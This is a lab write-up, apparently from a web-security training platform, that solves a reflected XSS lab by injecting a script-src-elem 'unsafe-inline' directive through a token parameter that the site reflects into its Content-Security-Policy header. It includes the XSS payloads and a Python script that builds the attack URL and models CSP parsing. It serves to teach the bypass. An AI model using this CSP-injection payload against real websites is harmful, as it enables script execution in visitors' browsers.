
LAB 30 - Reflected XSS protected by CSP, with CSP bypass

Initial instructions

This lab uses CSP and contains a reflected XSS vulnerability.

To solve the lab, perform a cross-site scripting attack that bypasses the CSP and calls the alert function.

Please note that the intended solution to this lab is only possible in Chrome.

First, I entered a simple XSS payload in the search box.

<img src=1 onerror=alert(1)>

The payload is reflected into the page, but the CSP blocks the inline onerror handler, so nothing executes.

Let's open this request in Burp Suite and look at its CSP.

The response carries a Content-Security-Policy header, and its report-uri directive ends in a query parameter called token. That token value is taken from the token parameter of the request URL and reflected into the header without any encoding, so we control part of the header. Because a semicolon separates CSP directives, a token that starts with a semicolon terminates report-uri and lets us append a directive of our own to the policy.

For that I built the following payload:

<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'

I injected it as the value of the search parameter in the URL (URL-encoded as needed), so that the &token= part becomes a separate query parameter. The semicolon closes the report-uri directive and script-src-elem 'unsafe-inline' is appended as a new directive. script-src-elem governs <script> elements and takes precedence over script-src for them, so the reflected <script>alert(1)</script> is allowed to run. Appending a second script-src directive instead would not work, because a browser honours only the first occurrence of a directive name and the policy already has script-src 'self'. Browsers that do not implement script-src-elem simply ignore the unknown directive and keep enforcing script-src 'self', which is why the lab notes that the intended solution only works in Chrome.
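The following script is an added example, not part of the original write-up or of the lab's own code. It reconstructs the header-injection step so it can be checked offline: the BASE_POLICY string is my assumption of how the lab builds its header (the token reflected verbatim onto the end of report-uri), the function names are hypothetical, and the parser applies the two CSP rules the bypass depends on, namely that ';' separates directives and that only the first occurrence of a directive name counts. It also shows why the second script-src variant fails while script-src-elem succeeds.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Assumed reconstruction of the lab's policy (not the server's real code): the
# value of the token query parameter is appended to report-uri unencoded.
BASE_POLICY = ("default-src 'self'; object-src 'none'; script-src 'self'; "
               "style-src 'self'; report-uri /csp-report?token=")


def build_csp_header(token: str) -> str:
    """Mimic the vulnerable server: reflect the token straight into the header."""
    return BASE_POLICY + token


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a policy the way a browser does: ';' separates directives,
    whitespace separates the directive name from its source list, and only
    the first occurrence of a directive name is honoured."""
    directives: dict[str, list[str]] = {}
    for chunk in header.split(";"):
        chunk = chunk.strip()
        if not chunk:
            continue
        name, *sources = chunk.split()
        directives.setdefault(name.lower(), sources)  # later duplicates are ignored
    return directives


def inline_script_elements_allowed(header: str) -> bool:
    """Would a browser that implements script-src-elem run an inline <script>?
    script-src-elem governs <script> elements; if it is absent, script-src
    applies, then default-src. Nonces and hashes are not modelled (the lab
    uses none)."""
    policy = parse_csp(header)
    for name in ("script-src-elem", "script-src", "default-src"):
        if name in policy:
            return "'unsafe-inline'" in policy[name]
    return True  # no governing directive at all: unrestricted


def build_attack_url(base: str, search: str, token: str) -> str:
    """Build the lab URL: the XSS goes in search, the directive injection in token."""
    return f"{base}/?{urlencode({'search': search, 'token': token})}"


def token_as_seen_by_server(url: str) -> str:
    """The server decodes the query string before reflecting the token."""
    return parse_qs(urlparse(url).query)["token"][0]


if __name__ == "__main__":
    url = build_attack_url("https://lab.example", "<script>alert(1)</script>",
                           ";script-src-elem 'unsafe-inline'")
    print(url)
    header = build_csp_header(token_as_seen_by_server(url))
    print(header)
    print("inline <script> allowed:", inline_script_elements_allowed(header))
```

Running it prints the encoded attack URL, the resulting policy with the appended directive, and True for the script-src-elem injection; swapping the token for ;script-src 'unsafe-inline' yields False, because the original script-src 'self' is the first occurrence and wins.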

Congratulations, you solved the lab!